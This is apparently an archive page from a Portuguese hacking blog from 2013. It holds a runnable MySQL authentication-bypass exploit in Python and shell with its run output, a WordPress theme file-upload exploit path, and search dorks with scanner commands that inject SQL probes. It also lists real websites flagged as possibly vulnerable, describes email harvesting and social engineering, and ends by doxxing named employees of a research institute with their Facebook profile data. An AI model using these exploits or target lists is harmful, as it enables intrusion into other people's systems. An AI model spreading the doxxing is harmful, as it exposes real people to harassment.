Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

sexta-feira, 29 de novembro de 2013

Conheça MySQL Authentication Bypass Exploit.


Conheça MySQL Authentication Bypass Exploit.


MySQL permite a autenticação de qualquer usuário válido (ou seja, root ativos em 99% das instalações) sem a necessidade de senha, utilizando apenas um simples LOOP  de tentativas exaustivo de conexões.

Todas as versões do MySQL e MariaDB até 5.1.61, 5.2.11, 5.3.5, 5.5.22 são vulnerável.
Versões de MariaDB 5.1.62, 5.2.12, 5.3.6, 5.5.23 não são.
Versões do MySQL 5.1.63 de, 5.5.24, 5.6.6 não são.

Esta questão foi atribuído um ID:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122

O que significa que, se alguém sabe um nome de usuário para se conectar (e "root" quase sempre existe), ela pode se conectar usando * qualquer senha * repetindo tentativas de conexão. ~ 300 tentativas leva apenas uma fração de segundo, então basicamente conta a proteção por senha é tão bom como inexistente.

Qualquer cliente vai fazer, não há necessidade de uma biblioteca libmysqlclient especial.

EXPLOIT CÓDIGO PYTHON:

#!/usr/bin/python
import subprocess

  1. import subprocess
  2.  
  3. ipaddr = raw_input("Enter the IP address of the mysql server: ")
  4.  
  5. while 1:
  6.     subprocess.Popen("mysql --host=%s -u root mysql --password=blah" % (ipaddr), shell=True).wait()


EXPLOIT CÓDIGO EM SHELLSCRIPT:

while true; do mysql -u root --password=senha -h 127.0.0.1 2>/dev/null; done


Executando comando exploit em python:

[email protected]:~# python mysql.py
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)

Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 24598
Server version: 5.1.62-0ubuntu0.11.10.1 (Ubuntu)

Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.

mysql>

Exploit:
PYTHON
http://pastebin.com/JuHZX7zJ
PHP
http://pastebin.com/CTYx2hUt

Darknets e servidores ocultos: Identificar a verdadeira identidade IP. Rede I2P

ARTIGO FEITO POR: Adrian Crenshaw
Apresentado no evento BLACK HAT DC 2011 


ARTIGO FEITO POR: Adrian Crenshaw Apresentado no evento BLACK HAT DC 2011


Este artigo irá apresentar a pesquisa em serviços hospedados internamente no I2P
rede anonimato , com foco em I2P hospedado sites conhecidos como eepSites , e como o
verdadeira identidade do anfitrião Internet fornecendo o serviço pode ser identificado por meio de informações vazamentos na camada de aplicação . Ao saber a identidade do host da Internet fornecendo o serviço , o conjunto de anonimato da pessoa ou grupo que administra o serviço pode ser grandemente reduzida , se não completamente eliminado .

O objetivo principal deste trabalho será o de testar a anonimato fornecido pela I2P para hospedagem
eepSites , concentrando-se principalmente na camada e aplicação erros administradores e desenvolvedores
podem fazer que poderia expor um prestador de serviços de identidade ou reduzir os conjunto1 anonimato eles fazem parte. Vamos mostrar os ataques com base em a interseção de usuários I2P hospedagem
eepSites em IPs públicos com hospedagem virtual, o uso de aplicação web comum vulnerabilidades para revelar o voltado para a Internet IP de um eepSite , bem como em geral a informação que pode ser recolhida, relativa os nós participantes do anonimato I2P rede .
introdução :

I2P2 é uma Darknet distribuído usando o modelo mixnet , de certa forma semelhante ao Tor, mas especializada no fornecimento interno serviços em vez de out- proxy para o Internet em geral. O nome I2P foi original 1 Um conjunto anonimato é o número total de possíveis candidatos para a identidade de um entidade .
Reduzindo os meios set anonimato que você pode diminuir os suspeitos.
2 Todos os detalhes de como I2P é implementado pode
ser encontrado em:

abreviação de " Invisível Internet Project", embora raramente é referido por esta longa
formar mais. Ele destina-se a actuar como um rede sobreposta no topo da Internet pública
adicionar anonimato e segurança. 


Um objetivo secundário seria a de permitir a identificação de certos grupos que a aplicação da lei pode ser
interessado na localização, especificamente pedófilos.
Essas metas são um pouco em probabilidades , uma vez que a aplicação da lei poderia usar o conhecimento para perseguir grupos para outro razões, e pedófilos poderia usar o conhecimento para ajudar a esconder-se, nem de que são desejados objetivos, mas com privacidade assuntos às vezes você tem que tomar a mal com o bem .
I2P foi escolhido como o plataforma já que menos pesquisa tem ido para ele versos Tor, mas muitas das mesmas idéias e técnicas deve ser aplicável tanto como sistemas que oferecem funcionalidade
semelhante quando se trata de serviços ocultos, que são HTTP baseado.

Artigo:
https://media.blackhat.com/bh-dc-11/Crenshaw/BlackHat_DC_2011_Crenshaw_Identifying_the_true_IP-wp.pdf

Curso OYS – [ Análise e Testes de Vulnerabilidades em Redes Corporativas ]

Curso OYS –  [ Análise e Testes de Vulnerabilidades em Redes Corporativas ]


Introdução à Segurança da Informação
Introdução ao Teste de Invasão e Ética Hacker
Google Hacking
Levantamento de Informações
Entendendo a Engenharia Social e o No-Tech Hacking
Varreduras ativas, passivas e furtivas de rede
Enumeração de informações e serviços
Trojans, Backdoors, Vírus, Rootkits e Worms
Ignorando Proteções
Técnicas de Força Bruta
Vulnerabilidades em aplicações web
SQL Injection
Elevação de Privilégios Locais
Testando o sistema
Smurf Attack
Técnicas de Sniffing
Exploits
Ataques a Servidores WEB
Metasploit Framework

Tamanho: 5,71 GB
[ 6 ] PARTES:
http://goo.gl/5G3dI7
http://goo.gl/NhjsSj
http://goo.gl/dCCSxr
http://goo.gl/LlQVpq
http://goo.gl/jkYALy
http://goo.gl/2ylqKV

$fonte::::: https://twitter.com/Cr4t3r

Está protegido ? conheça o open-source "ferret"


Está protegido ?
Você pode olhar para o open-source "ferret".
Ele analisa um monte de e-mail diferente (SMTP, POP, IMAP) e protocolos de bate-papo (MSN, Yahoo e AOL).


Você pode olhar para o open-source "ferret". Ele analisa um monte de e-mail diferente (SMTP, POP, IMAP) e protocolos de bate-papo (MSN, Yahoo e AOL).
Foi escrito em 2007. É improvável que qualquer engenheiro NSA tenha escrito algum código semelhante.
Além disso, o código é muito rápido, ele pode ser executado em razoável
ligações multi-gigabit - o tipo que você encontraria em torneiras subaquáticas de links de fibra óptica.


Foi escrito em 2007. É improvável que qualquer engenheiro NSA tenha escrito algum código semelhante. Além disso, o código é muito rápido, ele pode ser executado em razoável ligações multi-gigabit - o tipo que você encontraria em torneiras subaquáticas de links de fibra óptica.



Fonte:
http://www.blackhat.com/presentations/bh-dc-07/Maynor_Graham/Presentation/bh-dc-07-Maynor_Graham-up.pdf

Repositório oficial do SCANNER INURL

Repositório oficial do SCANNER INURL

Repositório oficial do SCANNER INURL.
Scanner INURL utiliza motor de busca Google para achar seus alvos.

O projeto SCANNER INURL com interface web será descontinuado.
Assim dando mais foco ao Scanner em linha de comando.

BUSCA POSSÍVEIS VULNERABILIDADES

SQLI(MySQL,MS ACCESS,Microsoft SQL Server,ORACLE,POSTGRESQL) OU ERROS DE PROGRAMAÇÃO.

OPÇÕES PARA SETAR PROXY.

MUDAR O MOTOR DE BUSCA GOOGLE 202 DISPONÍVEIS.

SETAR EXPLOIT.

PERSONALIZAR PROCURA DE ERROS DENTRO DE CADA URL ENCONTRADA.

GRUPO GOOGLEINURL BRASIL - PESQUISA AVANÇADA.

Repositório:
https://code.google.com/p/scanner-inurl/

quarta-feira, 27 de novembro de 2013

Usando SCANNER INURL para encontrar falhas / Mybb Ajaxfs Plugin Sql Injection vulnerability.

Usando o [ SCANNER INURL 1.0 CONSOLE ], para encontrar erros "Mybb Ajaxfs Plugin Sql Injection vulnerability".

MyBB (MyBulletinBoard) é um software de sistema de fóruns (bulletin board system) desenvolvido pelo grupo MyBB, é escrito utilizando as linguagens PHP e MySQL, está licenciado como um software livre sob uma GNU Lesser General Public License.

Para explorar a falha no plugin Ajaxfs devemos efetuar uma busca, mas vamos usar
SCANNER INURL CONSOLE.

Download SCANNER INURL CONSOLE:
https://code.google.com/p/scanner-inurl/

Dork[1]::: inurl:ajaxfs.php?tooltip=
Dork[2]::: inurl:ajaxfs.php
Dork[3]::: inurl:/ajaxfs ext:php 

Entenda a falha:
http://pastebin.com/XyDrh5SG

Configurando para o scan.
Comando:
php botConsole.php --host='www.google.com.br' --dork="inurl:ajaxfs.php?tooltip=" --arquivo='resultado.txt' --tipoerro='1' --exploit="'\--0x27;"

php botConsole.php --host='www.google.com.br' --dork="inurl:ajaxfs.php?tooltip=" --arquivo='resultado.txt' --tipoerro='1' --exploit="'\--0x27;"


Executando

Executando SCANNER INURL





Dorks captura de informações server's

Dorks captura de informações server's

DORKS:
comment:Pages containing network or vulnerability data***-----
filetype:log intext:"ConnectionManager2"
"apricot - admin" 00h
"Network Host Assessment Report" "Internet Scanner"
"Output produced by SysWatch *"
"Phorum Admin" "Database Connection" inurl:forum inurl:admin
"Powered by phpOpenTracker" Statistics
"powered | performed by Beyond Security's Automated Scanning" -kazaa -example
"SnortSnarf alert page"
"This file was generated by Nessus"
"this proxy is working fine!" "enter *" "URL***" * visit
"This report lists" "identified by Internet Scanner"
"Traffic Analysis for" "RMON Port * on unit *"
"Version Info" "Boot Version" "Internet Settings"
((inurl:ifgraph "Page generated at") OR ("This page was built using ifgraph"))
ACID "by Roman Danyliw" filetype:php -----Analysis Console for Incident Databases 12-Jul-2004 866-----
ext:cfg radius.cfg
ext:cgi intext:"nrg-" " This web page was created on "
filetype:pdf "Assessment Report" nessus
filetype:php inurl:ipinfo.php "Distributed Intrusion Detection System"
filetype:php inurl:nqt intext:"Network Query Tool"
filetype:vsd vsd network -samples -examples
intext:"Welcome to the Web V.Networks" intitle:"V.Networks [Top]" -filetype:htm
intitle:"ADSL Configuration page"
intitle:"Azureus : Java BitTorrent Client Tracker"
intitle:"BNBT Tracker Info"
intitle:"Microsoft Site Server Analysis"
intitle:"PHPBTTracker Statistics" | intitle:"PHPBT Tracker Statistics"
intitle:"start.managing.the.device" remote pbx acc
intitle:"sysinfo * " intext:"Generated by Sysinfo * written by The Gamblers."
intitle:"twiki" inurl:"TWikiUsers"
inurl:"/catalog.nsf" intitle:catalog
inurl:"install/install.php"
inurl:"map.asp?" intitle:"WhatsUp Gold"
inurl:"sitescope.html" intitle:"sitescope" intext:"refresh" -demo
inurl:/adm-cfgedit.php
inurl:/cgi-bin/finger? "In real life"
inurl:/cgi-bin/finger? Enter (account|host|user|username)
inurl:phpSysInfo/ "created by phpsysinfo"
inurl:portscan.php "from Port"|"Port Range"
inurl:statrep.nsf -gov
inurl:testcgi xitami
inurl:webutil.pl
"Looking Glass" (inurl:"lg/" | inurl:lookingglass) -----Looking Glass-----
intitle:That.Site.Running Apache

[ SCANNER INURLBR / TERMINAL. ]


Mais uma ferramenta para os dorkeiros de plantão.


* SCANNER INURLBR 1.0
* PHP Version 5.4.7
* php5-curl LIB
* cURL support enabled
* cURL Information 7.24.0
* Apache 2.4
* allow_url_fopen = On
* Motor de busca GOOGLE
* Permissão Leitura & Escrita
* BUSCA POSSÍVEIS VULNERABILIDADES
* SQLI(MySQL,MS ACCESS,Microsoft SQL Server,ORACLE,POSTGRESQL) OU ERROS DE PROGRAMAÇÃO.
* OPÇÕES PARA SETAR PROXY.
* MUDAR O MOTOR DE BUSCA GOOGLE 202 DISPONÍVEIS.
* SETAR EXPLOIT.
* PERSONALIZAR PROCURA DE ERROS DENTRO DE CADA URL ENCONTRADA.
* GRUPO GOOGLEINURL BRASIL - PESQUISA AVANÇADA.
* fb.com/GoogleINURL
* twitter.com/GoogleINURL
* blog.inurl.com.br

--host='www.google.com.br'
--dork='sua dork'
--arquivo='seusResultados.txt'
--tipoerro='1 ou 2'
--exploit='O que vai ser injetado no final de cada url'
--achar='Funciona com Tipoerro 2 para procurar strings personalizadas em cada URL' 
--ipproxy='IP PROXY EX: 172.16.0.150' 
--porta='PORTA do proxy'

O PARÂMETRO --tipoerro tem duas opções:
1 - O Scanner vai procurar erros padrões do script SQLI(MySQL,MS ACCESS,Microsoft SQL Server,ORACLE,POSTGRESQL) OU ERROS DE PROGRAMAÇÃO.
O mesmo vinculado com seu EXPLOIT que pode ser deixado vazio --exploit='' o exploit sempre será usado no final das urls,Padrão básico
sqlinjection.
2 - Opção para personalizar sua execução onde é habilitado o parâmetro --achar='',Achar funciona para procurar sua definição dentro das urls encontradas.
Ex[1]: --achar='WordPress' isso vai procurar a palavra WordPress em todas urls encontradas pelo scanner.
Ex[2]: --tipoerro='2' --exploit='wp-login.php' --achar='WordPress'\r"; 

Exemplos de uso.
Comando:
php botConsole.php  --host='www.google.co.bw' --dork='site:br inurl:/wp-content/themes/ "Index of /"' --arquivo='resultado.txt' --tipoerro='2' --exploit='' --achar='Index of'
[ SCANNER INURLBR / TERMINAL. ] php botConsole.php  --host='www.google.co.bw' --dork='site:br inurl:/wp-content/themes/ "Index of /"' --arquivo='resultado.txt' --tipoerro='2' --exploit='' --achar='Index of'


Comando:
php botConsole.php ajuda
php botConsole.php ajuda


Comando:
php botConsole.php hosts
php botConsole.php hosts


Baixar: https://code.google.com/p/scanner-inurl/

Guia de Referência do Nmap (Página do Manual)


Guia de Referência do Nmap (Página do Manual)


O Nmap (“Network Mapper”) é uma ferramenta de código aberto para exploração de rede e auditoria de segurança. Ela foi desenhada para escanear rapidamente redes amplas, embora também funcione muito bem contra hosts individuais. O Nmap utiliza pacotes IP em estado bruto (raw) de maneira inovadora para determinar quais hosts estão disponíveis na rede, quais serviços (nome da aplicação e versão) os hosts oferecem, quais sistemas operacionais (e versões de SO) eles estão executando, que tipos de filtro de pacotes/firewalls estão em uso, e dezenas de outras características. Embora o Nmap seja normalmente utilizado para auditorias de segurança, muitos administradores de sistemas e rede consideram-no útil para tarefas rotineiras tais como inventário de rede, gerenciamento de serviços de atualização agendados, e monitoramento de host ou disponibilidade de serviço.

A saída do Nmap é uma lista de alvos escaneados, com informações adicionais de cada um dependendo das opções utilizadas. Uma informação chave é a “tabela de portas interessantes”. Essa tabela lista o número da porta e o protocolo, o nome do serviço e o estado. O estado pode ser aberto (open), filtrado (filtered), fechado (closed), ou não-filtrado (unfilterd). Aberto (open) significa que uma aplicação na máquina-alvo está escutando as conexões/pacotes naquela porta. Filtrado (filtered) significa que o firewall, filtro ou outro obstáculo de rede está bloqueando a porta de forma que o Nmap não consegue dizer se ela está aberta (open) ou fechada (closed). Portas fechadas (closed)não possuem uma aplicação escutando nelas, embora possam abrir a qualquer instante. Portas são classificadas como não filtradas (unfiltered)quando elas respondem às sondagens do Nmap, mas o Nmap não consegue determinar se as portas estão abertas ou fechadas. O Nmap reporta as combinações aberta|filtrada (open|filtered)e fechada|filtrada (closed|filtered)quando não consegue determinar qual dos dois estados descrevem melhor a porta. A tabela de portas também pode incluir detalhes de versão de software quando a detecção de versão for solicitada. Quando um scan do protocolo IP é solicitado (-sO), o Nmap fornece informações dos protocolos IP suportados ao invés de portas que estejam abertas.

Além da tabela de portas interessantes, o Nmap pode fornecer informações adicionais sobre os alvos, incluíndo nomes de DNS reverso, possível sistema operacional, tipos de dispositivos e endereços MAC.

Um scan típico do Nmap é mostrado em Example 1, “Uma amostra de scan do Nmap”. Os únicos argumentos que o Nmap utiliza nesse exemplo são -A, para habilitar a detecção de SO e a versão, -T4 para execução mais rápida, e os hostnames de dois alvos.
::::Guia de Referência::::
Notas da Tradução
Sumário das Opções
Especificação de Alvo
Descoberta de Hosts
Fundamentos do Escaneamento de Portas
Técnicas de Escaneamento de Portas
Especificação de Portas e Ordem de Scan
Detecção de Serviço e Versão
Detecção de SO
Temporização (Timing) e Desempenho
Evitando e enganando o Firewall/IDS
Saída (Output)
Opções Diversas (Miscelânea)
Interação em Tempo de Execução
Exemplos
Bugs
Autor

Dominando Nmap Scripting Engine.

Dominando Nmap Scripting Engine.

• NSE Intro & Usage
• Large-scale Scan #1: SMB/MSRPC
• Large-scale Scan #2: Favicon
• Writing NSE Scripts
• Live Script Writing Demo
• Nmap News
• Final Notes & Q/A.

http://nmap.org/presentations/BHDC10/Fyodor-David-BlackHatUSA-2010-Slides.pdf

terça-feira, 26 de novembro de 2013

Wordpress Themes Pinboard Arbitrary File Upload Vulnerability

BUG WP THEMES PINBOARD


EXPLOIT WP ~~~
#Author : ReC0ded
#Vendor : http://themify.me/
#Download : http://themify.me/themes/Pinboard
#Date : 22, November 2013.
#Type : php, html, htm, asp, etc.
#Category : Web Applications
#Vulnerability : File Upload


#Dork[1] : inurl:/wp-content/themes/pinboard/
#Dork[2] : inurl:site:br /themes/pinboard/
 #Dork[3] : inurl:/themes/pinboard/ ext:php

Falha:
#Exploit : http://SITEWPVULL.COM.BR/{PASTA}/wp-content/themes/pinboard/themify/themify-ajax.php

ARQUIVO UPADO:

http://SITEWPVULL.COM.BR/{PASTA}/wp-content/themes/pinboard/uploads/{ARQUIVO}.php


EXPLOIT UPLOAD:http://pastebin.com/FwSP3bQT

sexta-feira, 22 de novembro de 2013

Usando SCANNER INURL para encontrar Vull's WP

EXPLOIT
Wordpress Amplus Theme - CSRF Vulnerability
Wordpress Amplus Theme - CSRF Vulnerability
RESULTADO
Usando SCANNER INURL Wordpress Amplus Theme - CSRF Vulnerability

BOT - SCANNER PRIV8 / - INURLBR

TOTAL DE URL's: 86

EXPLOIT USADO:

DORK: inurl:/themes/amplus/
ENCONTRAR: /amplus/scripts/
TOTAL DE POSSÍVEIS VULL: 37
ARQUIVO COM RESULTADO: resultados.txt

LISTA:


http://washingtonavenuecommons.com/wp-content/themes/amplus/scripts/prettyphoto/
http://washingtonavenuecommons.com/wp-content/themes/amplus/scripts/prettyphoto/images/prettyPhoto/
http://washingtonavenuecommons.com/wp-content/themes/amplus/scripts/prettyphoto/images/backgrounds/
http://telplus-inc.com/blog/wp-content/themes/amplus/scripts/
http://www.intuneautoworks.com/home/wp-content/themes/amplus/scripts/
http://www.intuneautoworks.com/home/wp-content/themes/amplus/scripts/syntaxhighlighter/
http://www.intuneautoworks.com/home/wp-content/themes/amplus/scripts/fonts/
www.intuneautoworks.com/home/wp.../
http://www.intuneautoworks.com/home/wp-content/themes/amplus/scripts/prettyphoto/
http://wnglaw.com/wp-content/themes/amplus/scripts/prettyphoto/
http://wnglaw.com/wp-content/themes/amplus/scripts/fonts/
http://wnglaw.com/wp-content/themes/amplus/scripts/syntaxhighlighter/
http://punc.psiada.org/wp-content/themes/amplus/scripts/syntaxhighlighter/scripts/
http://amaboston.org/wp-content/themes/amplus/scripts/syntaxhighlighter/styles/
http://www.avia-sys.com/wp-content/themes/amplus/scripts/syntaxhighlighter/scripts/
http://www.promisenaturalfoodsandbakery.com/wp-content/themes/amplus/scripts/prettyphoto/images/prettyPhoto/
http://light-eco-distribution.com/wp-content/themes/amplus/scripts/prettyphoto/js/
http://www.gettysburgfarmmarket.com/home/wp-content/themes/amplus/scripts/syntaxhighlighter/
http://www.gettysburgfarmmarket.com/home/wp-content/themes/amplus/scripts/prettyphoto/images/prettyPhoto/light_square/
http://www.dominiquediprima.com/wellness/wp-content/themes/amplus/scripts/fonts/
http://ringhello.co.uk/wp-content/themes/amplus/scripts/prettyphoto/
http://www.theglobalwarmingfoundation.org/wp-content/themes/amplus/scripts/syntaxhighlighter/styles/
www.theglobalwarmingfoundation.org/wp.../
http://www.kidzrchampions2.com/wp-content/themes/amplus/scripts/prettyphoto/images/thumbnails/
www.kidzrchampions2.com/wp.../
http://www.buc-holland.com/wp-content/themes/amplus/css/
http://training.dontsayno.in/wp-content/themes/amplus/amplus_v1.6/scripts/prettyphoto/
http://192.185.16.232/~wnglaw/wp-content/themes/amplus/scripts/prettyphoto/
http://192.185.16.232/~wnglaw/wp-content/themes/amplus/scripts/syntaxhighlighter/
http://192.185.16.232/~wnglaw/wp-content/themes/amplus/scripts/prettyphoto/css/
http://192.185.16.232/~wnglaw/wp-content/themes/amplus/scripts/prettyphoto/js/
http://www.laroccaallevamento.it/site/wp-content/themes/amplus/scripts/
http://www.laroccaallevamento.it/site/wp-content/themes/amplus/scripts/prettyphoto/js/
http://www.laroccaallevamento.it/site/wp-content/themes/amplus/scripts/prettyphoto/images/prettyPhoto/dark_square/
http://www.gambit.ph/themes/amplus
http://takeadriver.nl/wp-content/themes/amplus/scripts/syntaxhighlighter/scripts/
http://www.friendslookup.com/wp-content-themes-amplus-functions-timthumb


Exploit: http://www.exploit-db.com/exploits/29669/

segunda-feira, 11 de novembro de 2013

Exercícios são baseados em vulnerabilidades comuns encontrados em sistemas.


0xESTUDOS 0xPENTEST


Os Exercícios são baseados em vulnerabilidades comuns encontrados em sistemas diferentes. As questões não são emulados. Nós fornecemos-lhe sistemas reais com vulnerabilidades reais.

Faça o download do ISO eo PDF. Inicie o ISO usando qualquer software de virtualização e começar a aprender!

WEB FOR PENTESTER II
http://files.pentesterlab.com/web_for_pentester_II/web_for_pentester_II.pdf

FROM SQL INJECTION TO SHELL II
http://files.pentesterlab.com/from_sqli_to_shell_II/from_sqli_to_shell_II.pdf

CVE-2012-6081: MOINMOIN CODE EXECUTION
http://files.pentesterlab.com/cve-2012-6081/cve-2012-6081.pdf

WEB FOR PENTESTER
http://files.pentesterlab.com/web_for_pentester/web_for_pentester.pdf


AXIS2 AND TOMCAT MANAGER
http://files.pentesterlab.com/axis2_and_tomcat_manager/axis2_and_tomcat_manager.pdf


CVE-2008-1930: Wordpress 2.5 Cookie Integrity Protection Vulnerability
http://files.pentesterlab.com/cve-2008-1930/cve-2008-1930.pdf


From SQL injection to Shell: PostgreSQL edition
http://files.pentesterlab.com/from_sqli_to_shell_pg_edition/from_sqli_to_shell_pg_edition.pdf

Rack Cookies and Commands Injection
http://files.pentesterlab.com/rack_cookies_and_commands_injection/rack_cookies_and_commands_injection.pdf


Introduction to Linux Host Review
http://files.pentesterlab.com/linux_host_review/linux_host_review.pdf

CVE-2012-2661: ActiveRecord SQL injection
http://files.pentesterlab.com/cve-2012-2661/cve-2012-2661.pdf

CVE-2012-1823: PHP CGI
http://files.pentesterlab.com/cve-2012-1823/cve-2012-1823.pdf


PHP Include And Post Exploitation
http://files.pentesterlab.com/php_include_and_post_exploitation/php_include_and_post_exploitation.pdf


From SQL injection to Shell
http://files.pentesterlab.com/from_sqli_to_shell/from_sqli_to_shell.pdf

Principal: https://www.pentesterlab.com/exercises/




segunda-feira, 28 de outubro de 2013

WhatWeb Scanner

WhatWeb 

WhatWeb é a próxima geração do scanner web.
WhatWeb  scanner

WhatWeb reconhece tecnologias web, incluindo sistemas de gerenciamento de conteúdo (CMS), plataformas de blogs, estatística / pacotes de análise, bibliotecas JavaScript, servidores web e dispositivos embarcados.

WhatWeb tem mais de 1000 plugins, cada um a reconhecer algo diferente. WhatWeb também identifica números de versão, endereços de e-mail, identificações de contas, módulos de frameworks web, erros de SQL, e muito mais.

WhatWeb pode ser furtivo e rápido, ou profundo, mas lento. WhatWeb suporta um nível de agressividade para controlar o trade off entre velocidade e confiabilidade. Quando você visita um site no seu navegador, a transação inclui muitas dicas do que tecnologias web estão alimentando o site. Às vezes, uma única visita página contém informações suficientes para identificar um site, mas quando isso não acontece, WhatWeb pode interrogar o site ainda mais. O nível padrão de agressão, chamado "passivo", é o único pedido HTTP de um site mais rápido e exige. Isso é adequado para a digitalização de sites públicos. Modos mais agressivas foram desenvolvidos para testes de penetração.


Baixar: http://whatweb.net/

WPSCAN scanner

WPScan
WPScan console

WPSCAN é um scanner feito em Ruby que busca possíveis vulnerabilidades em seus alvos com CMS Wordpress.

Este programa é software livre: você pode redistribuí-lo e / ou modificá-lo sob os termos da GNU General Public License conforme publicada pela Free Software Foundation, tanto a versão 3 da Licença, ou (a seu critério) qualquer versão posterior.

terça-feira, 22 de outubro de 2013

SCANNER INURL-MAIL 1.0

/*
###################################
* SCANNER INURL-MAIL 1.0
* PHP Version 5.4.7
* php5-curl LIB
* cURL support enabled
* cURL Information 7.24.0
* Apache 2.4
* allow_url_fopen = On
* Motor de busca GOOGLE
* Permissão Leitura & Escrita
* -----------------------------------------------------------------
* BUSCA LISTMAIL
* OBJETIVO USAR O MOTOR DE BUSCA GOOGLE PARA CAPTURAR EMAILS LIST.
* A CADA URL ENCONTRADA PELO BUSCADOR, SERA EFETUADO UM FILTRO CAPTURANDO OS EMAILS
* CONTIDOS NA URL.
* -----------------------------------------------------------------
* GRUPO GOOGLEINURL BRASIL - PESQUISA AVANÇADA.
* fb.com/GoogleINURL
* twitter.com/GoogleINURL
* blog.inurl.com.br
################################
*/
SCANNER INURL-MAIL 1.0

SCANNER INURL-MAIL 1.0

Script: http://pastebin.com/q5iZyJEz

0x Dns hijacking + Google hacking e engenaria social 0x

0x Dns hijacking + Google hacking e engenaria social 0x

0x Dns hijacking + Google hacking e engenaria social 0x

Como todos sabemos o elo mais fraco de qualquer sistema e o humano que facilmente pode ser enganado nos últimos dias vimos grandes ataques da kdms palestine team o exemplo que usarei nesse paper e a metasploit um grande icone haha
0x Entenda o ataque 0x
Uma brincadeira que chego a fazer e se os nego da palestina vim pro br desligo ate minha geladeira
Bom o ataque ao metasploit aconteceu da seguinte forma provavelmente um funcionário estava de resaca e receber um lindo fax com os nego da kdms se passando por um dos diretores pedindo acesso é o bom funcionário passou o acesso facil ne ?
como seria útil coloca um firewall ou um ant virus no humano rs.
Por um bom tempo uma prática conhecida como pentester físico foi utilizada (atividade ilustrada no filme hackers piratas)
bom mas por que o pentest físico ?
Bom meu caro sempre e bom da aqueka stalkeada basica rs tenta conquista a confiança e tenta suga alguma info por isso temos muitas meninas no meio do hacking altas E.S hahaha'

O que conseguiremos com o stalker bom muitas pessoas ainda escrevem senhas em papeis dados para lembra etc quando obter informações do tipo facilitará o diagnóstico de personalidade ou ate mesmo terá as senhas em mãos rs
0x DNS hijacking 0x
O ataque o ataque em si não prejudicar de nenhuma forma o conteúdo do site ele apenas alterá o dns.
muitas vezes o ataque para ser completo demora 48 horas tempo máximo para o dns fixá mas apos sofrê esse ataque se for comprovado a empresa e obrigada a recolocá o dns original na mesma hora por isso apos a avg o whatsapp e ate mesmo a metasploit sofre o sequestro de seu domínio o ficou off ate a regularização de dns
0x Google Hacking 0x
bom na parte relacionada a google hacking estarei citando a parte de d0xing que não e nada mais que uma busca voltada para empresa ou pessoa antes de tenta engenharia social e sempre bom saber amigos do alvo gostos etc.

Feito por :0x C0rPs3 0x
https://twitter.com/elC0rPs3

segunda-feira, 21 de outubro de 2013

INFORMAÇÕES IMPORTANTES - INSTITUTO ROYAL

INFORMAÇÕES IMPORTANTES - INSTITUTO ROYAL

=================================
INFORMAÇÕES IMPORTANTES - INSTITUTO ROYAL
=================================

=================================
MANUAL DE TESTE REALIZADOSl:
=================================
www.ipd-farma.org.br/uploads/paginas/file/palestras/6_ENIFarMed/Katia%20de%20Angelis.pdf

=================================
LISTA COMPLETA DE TORTURADORES
=================================
- Diretor Científico: João Antônio Pegas Henriques

- Diretora Científica-Toxicologia: Ingrid Dragan Taricano www.facebook.com/ingrid.dragantaricano
{
   "id": "100002354535130",
   "name": "Ingrid Maria Camara",
   "first_name": "Ingrid",
   "last_name": "Maria Camara",
   "link": "http://www.facebook.com/ingrid.dragantaricano",
   "username": "ingrid.dragantaricano",
   "gender": "female",
   "locale": "pt_BR"
}

- Supervisora Científica: Leoni Bonamin www.facebook.com/leoni.bonamin
{
   "id": "100000534709413",
   "name": "Lel\u00e9 Lel\u00e9",
   "first_name": "Lel\u00e9",
   "last_name": "Lel\u00e9",
   "username": "leoni.bonamin",
   "gender": "female",
   "locale": "pt_BR"
}

- Gerente Toxologia: Aline Pimentel Zanzeri www.facebook.com/aline.pimentel.399
{
   "id": "534988968",
   "name": "Aline Zan",
   "first_name": "Aline",
   "last_name": "Zan",
   "link": "http://www.facebook.com/aline.pimentel.399",
   "username": "aline.pimentel.399",
   "gender": "female",
   "locale": "pt_BR"
}

- Gerente Genotox: Miriam Benicio da Fonseca www.facebook.com/miriam.benicio.3
{
   "id": "100000022458853",
   "name": "Miriam Benicio",
   "first_name": "Miriam",
   "last_name": "Benicio",
   "link": "http://www.facebook.com/miriam.benicio.3",
   "username": "miriam.benicio.3",
   "gender": "female",
   "locale": "pt_BR"
}

=================================
DIRETOR DE ESTUDO
=================================
- Cães, Coelhos e Roedores: Cesar Sato www.facebook.com/cesar.sato.1
{
   "id": "1815020379",
   "name": "Cesar Sapo",
   "first_name": "Cesar",
   "last_name": "Sapo",
   "username": "cesar.sato.1",
   "gender": "male",
   "locale": "pt_BR"
}

- Coelhos e Roedores: Camila Bento de Lima www.facebook.com/camila.lima.528
{
   "id": "1109525657",
   "name": "Camila Lima",
   "first_name": "Camila",
   "last_name": "Lima",
   "link": "http://www.facebook.com/camila.lima.528",
   "username": "camila.lima.528",
   "gender": "female",
   "locale": "pt_BR"
}

- Cães: Simone de Oliveira Castro www.facebook.com/simone.castro.357
{
   "id": "1415407448",
   "name": "Si Si",
   "first_name": "Si",
   "last_name": "Si",
   "username": "simone.castro.357",
   "gender": "female",
   "locale": "pt_BR"
}

- Genotocixidade: Miriana da Silva Machado www.facebook.com/miriana.machado
{
   "id": "1588063020",
   "name": "Miriana Machado",
   "first_name": "Miriana",
   "last_name": "Machado",
